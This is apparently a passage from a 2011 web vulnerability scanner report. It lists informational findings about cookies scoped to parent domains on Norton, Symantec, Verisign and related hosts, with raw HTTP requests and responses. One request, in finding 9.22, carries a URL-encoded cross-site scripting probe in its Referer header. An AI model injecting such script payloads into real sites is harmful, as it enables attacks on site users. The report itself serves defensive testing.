Cookie: s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; BIGipServerbuy1_prd_SSL=4046749583.16671.0000; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; LASTTIME_CV_DATE=Sep-09-2011 14:31:18; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; AKNORT=0; mbox=check#true#1315621970|session#1315621887128-280442#1315623770|PC#1315621887128-280442.19#1316831510|profile#+_COUNTRY-US+_LANGUAGE-en+_TRAFFIC_SOURCE-trf_id%3Asymcom+_PGM_TYPE-UNKNOWN+_SUBCHANNEL-Online%20%281st%29+_ORIG_SUB-Online%20%281st%29#1380421910; s_eVar63=%5B%5B'store%253Atrf_id%253Asymcom'%2C'1315621909811'%5D%5D; s_eVar65=%5B%5B'store%253Aonline%2520%25281st%2529'%2C'1315621909812'%5D%5D; s_cc=true

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:20 GMT
Location: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=5c55d1c3-a981-4fb5-9327-d629b62b51071315603880402
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:18; domain=buy.norton.com # environment specific; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LANGUAGE=EN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:31:20; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: TrafficSourceCookieName=trf_id:symcom; domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: OriginalSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
Set-Cookie: CurrentSubChannelCookieName=Online (1st); domain=.norton.com; expires=Saturday, 08-Sep-2012 21:31:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 397

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/estore/mf/up
...[SNIP]...

9.20. http://buy.symanteccloud.com/freetrial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.symanteccloud.com
Path:	/freetrial

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /freetrial HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 471

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.21. http://buy.symanteccloud.com/smbstore previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://buy.symanteccloud.com
Path:	/smbstore

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smbstore HTTP/1.1
Host: buy.symanteccloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:38:21 GMT
Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665
Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT
Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Length: 459

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.symanteccloud.com/estor
...[SNIP]...

9.22. http://free.pctools.com/res/js/utils.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://free.pctools.com
Path:	/res/js/utils.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /res/js/utils.php HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com

9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mbox3.offermatica.com
Path:	/m2/verisign/mbox/standard

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

9.24. http://sales.liveperson.net/hc/2735064/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/2735064/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.25. http://sales.liveperson.net/hc/71097838/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/71097838/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/products/downloads/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT
Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838
Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 33062

lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.31. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.32. https://trust-center.verisign.ch/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.33. https://trust-center.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.34. https://trust-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.35. https://trust-center.verisign.com/process/retail/help_and_support previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/help_and_support

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.36. https://trust-center.verisign.com/process/retail/redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/redirect

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.37. https://trust-center.verisign.com/process/retail/session_timeout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/session_timeout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.38. https://trust-center.verisign.com/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.39. https://trust-center.verisign.com/process/retail/trust_product_selector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/process/retail/trust_product_selector.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_product_selector.do HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/TeaLeafTarget.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_gray.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com

